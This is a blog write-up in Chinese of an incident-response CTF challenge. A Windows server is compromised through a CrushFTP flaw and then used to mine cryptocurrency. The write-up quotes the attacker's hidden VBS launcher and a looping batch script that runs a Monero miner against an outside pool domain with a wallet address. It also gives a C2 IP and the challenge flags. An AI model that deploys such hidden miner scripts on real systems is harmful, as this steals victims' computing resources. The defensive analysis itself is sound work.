当前位置: 首页 > news >正文

Solar月赛(应急响应)——攻击者使用什么漏洞获取了服务器的配置文件?

某某文化有限公司的运维小王刚刚搭建服务器发现cpu莫名的异常的升高请你帮助小王排查一下服务器。

文章目录

    • 事件介绍
    • 事件1:帮助小王找到是什么漏洞?
    • 事件2:系统每天晚上系统都会卡卡的帮小明找到问题出在了那?
    • 事件3:恶意域名是什么?
    • 事件4:疑似是什么组织发动的攻击?
    • 事件5:攻击者C2服务器IP是什么?
    • 总结


事件介绍

起因:某某文化有限公司的运维小王刚刚搭建服务器发现cpu莫名的异常的升高请你帮助小王排查一下服务器。
帮助小王找到是什么漏洞导致了小王的运维生涯受到了打击?(回答攻击者利用的漏洞编号)

主机pass:Ngy@667788
flag格式为:flag{CVE-2020-12345}

相关资料下载:
链接: https://pan.baidu.com/s/1vAXXygEwdhXtLeoF8yA6KA?pwd=9d97 提取码: 9d97

解压密码:MWhEYGjaHkjk3UkE


事件1:帮助小王找到是什么漏洞?

首先我们打开下载的镜像文件放到虚拟机里运行,发现是一台Windows 10 Server的服务器:

在这里插入图片描述

根据题目的 ”帮助小王找到是什么漏洞?“ ,我们可以发现桌面有几个文件,打开看一下;

在浏览器里搜索两个文件的名字,可以发现这两个都是CVE漏洞:

在这里插入图片描述
在这里插入图片描述
输入flag后发现都不对,然后我也是问AI他们各自都有哪些CVE漏洞,最后也是找到了CrushFTP的一个CVE漏洞符合:
在这里插入图片描述

flag{CVE-2025-31161}

事件2:系统每天晚上系统都会卡卡的帮小明找到问题出在了那?

根据题目的 ”刚刚搭建服务器发现cpu莫名的异常的升高“ ,我们可以想到要么是开机启动项存在可疑任务,或者就是计划任务存在挖矿程序。

在这里插入图片描述

根据上述这些思路,我们可以进行相应的排查:

(1)计划任务检查

  • 首先在搜索框任务计划程序 查看有哪些可疑的进程正在运行;
  • 单击【开始】>【设置】>【控制面板】>【任务计划程序】;
  • 单击【开始】>【运行】,输入 “cmd”,然后在命令提示符窗口中输入 “schtasks.exe

在这里插入图片描述

(2)检查开机启动项:

  • 单击【开始】>【所有程序】>【启动】,默认情况下此目录为空;
  • 单击【开始】>【运行】,输入 “msconfig”,在弹出的窗口中切换到 “启动” 选项卡,查看是否存在命名异常的启动项目。若有,取消勾选该项目,并根据命令中显示的路径删除对应的文件。

在这里插入图片描述

(当然上述这些方法可能都太麻烦了,有没有更简单的办法。)

有的,这时候我们也可以使用工具帮助我们进行排查:

我个人一般使用 D盾Autoruns 来进行相应的检查

话不多说,直接执行这两个程序(标红的表示可能是恶意程序或者计划任务)

也是发现了部分异样:计划任务
在这里插入图片描述

资源管理器:
在这里插入图片描述

然后也是找到了恶意的计划任务sql

在这里插入图片描述
sql backing up就是导致每晚卡顿的原因

flag{sqlbackingup}

事件3:恶意域名是什么?

根据之前的发现,继续在这个文件夹里发掘看看还有什么收获。

在这里插入图片描述

set ws=createobject("wscript.shell")
ws.Run """sqlwscript.cmd""",0
  • set ws=createobject(“wscript.shell”)

    • createobject("wscript.shell"):创建一个 WScript.Shell 对象的实例。这个对象能让脚本与 Windows 操作系统进行交互,例如执行程序、创建快捷方式、读写注册表等。
    • set ws = ...:把创建好的 WScript.Shell 对象赋值给变量ws,方便后续使用。
  • ws.Run “”“sqlwscript.cmd”“”,0

    • ws.Run ...:调用 WScript.Shell 对象的Run方法来执行外部程序或脚本。
    • """sqlwscript.cmd""":要执行的命令。这里使用三重引号是为了正确处理路径中可能存在的空格。第一个和第三个引号是 VBScript 字符串的定界符,中间的两个引号会被解析为批处理文件路径里的一个引号。
    • ,0:Run方法的第二个参数,表示窗口样式。值为 0 时,意味着程序会在后台运行,也就是不会显示窗口。

接下来再查看sqlwscript这个脚本:

在这里插入图片描述

代码如下:

@echo off
cd /d "%~dp0"
:start
sqlwpr.exe -a rx/0 --url b.oracleservice.top --user 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -t 0
goto start

从上面我们可以看到恶意的url了:

flag{b.oracleservice.top}

事件4:疑似是什么组织发动的攻击?

然后在文件夹发现一个应用程序sqlwpr,对刚才的代码进行分析:

  1. 基础设置:
    • @echo off:使命令执行过程不在控制台显示,保持界面干净。
    • cd /d "%~dp0":将工作目录切换到脚本所在目录,确保后续操作路径无误。
  2. 挖矿主循环:
    • :start和goto start构成无限循环,让挖矿程序持续运行。
    • sqlwpr.exe -a rx/0 --url b.oracleservice.top --user ... -t 0:调用挖矿程序进行加密货币挖掘。其中:
    • -a rx/0:采用 RandomX 算法,常用于门罗币(XMR)等加密货币的挖掘。
    • –url b.oracleservice.top:连接到指定的矿池服务器,该服务器域名显示与 Oracle 无关,是用于接收挖矿算力的远程地址。
    • --user ...:使用的矿工账户,是一个较长的字符串,用于标识挖矿收益的归属。
      - -t 0:设置线程数为 0,意味着程序会自动使用所有可用 CPU 核心,这会使 CPU 使用率大幅上升。

随后搜索恶意域名,发现具体的组织:
在这里插入图片描述
在这里插入图片描述

flag{8220Gang}

事件5:攻击者C2服务器IP是什么?

查看挖矿程序的上传时间,确定时间大概在2025.5.27 23:20:00左右

在这里插入图片描述

随后在Win + R 唤出cmd,然后输入eventvwr.msc 打开系统日志管理:

在这里插入图片描述
查询windows的安全日志,筛选 5156 事件(Windows 过滤平台放行连接),逐一查询这段时间之后powershell的出战痕迹

在这里插入图片描述

随后也是找到了相应的IP地址。具体如何筛选可以看这篇文章:Windows日志分析

当然,也可以直接导出筛选日志进行关键词搜索

将已筛选的日志导出为txt文件,然后直接搜索powershell.exe关键词,找出可疑的出站目的IP地址,即为C2服务器IP。

flag{156.238.230.57}

总结

没什么好说的,多学多练多复习。

http://www.dtcms.com/a/304501.html

相关文章:

  • GESP2025年6月认证C++七级( 第三部分编程题(2)调味平衡)
  • cuda中的线程块和线程束的区别以及什么是串行化 (来自deepseek)
  • 1 + X 传感网 中级 | 任务五 Wifi通信实践
  • 向量数据库深度解析:FAISS、Qdrant、Milvus、Pinecone使用教程与实战案例
  • Excel文件批量加密工具
  • 哈希函数详解:从MD5到SHA-3的密码学基石
  • JSON-RPC 2.0 规范
  • 寻找重复元素-类链表/快慢指针
  • 【lucene】currentFrame与staticFrame
  • Springboot+vue智能家居商城的设计与实现
  • 数据赋能(341)——技术平台——模块化
  • 2024高考综合本科率对比
  • 本地安装 SQLite 的详细步骤
  • Qt模型/视图结构
  • Python入门第三课:进阶编程技能: 文件操作与数据持久化
  • 【C++算法】78.BFS解决FloodFill算法_算法简介
  • 量子计算革命:重新定义计算的边界与未来
  • react 的 useTransition 、useDeferredValue
  • ZKmall开源商城架构工具链:Docker、k8s 部署与管理技巧
  • 反射核心:invoke与setAccessible方法详解
  • SpringBoot整合RocketMQ(阿里云ONS)
  • 数据库4.0
  • Linux 文件管理高级操作:复制、移动与查找的深度探索
  • Deep Research(信息检索增强)认识和项目实战
  • 计算器4.0:新增页签功能梳理页面,通过IO流实现在用户本地存储数据
  • 点控云数据洞察智能体:让房地产决策有据可循,让业务增长稳健前行
  • 【LLM】——qwen2.5 VL模型导出到onnx
  • Python中二进制文件操作
  • 快速了解逻辑回归
  • 【华为机试】43. 字符串相乘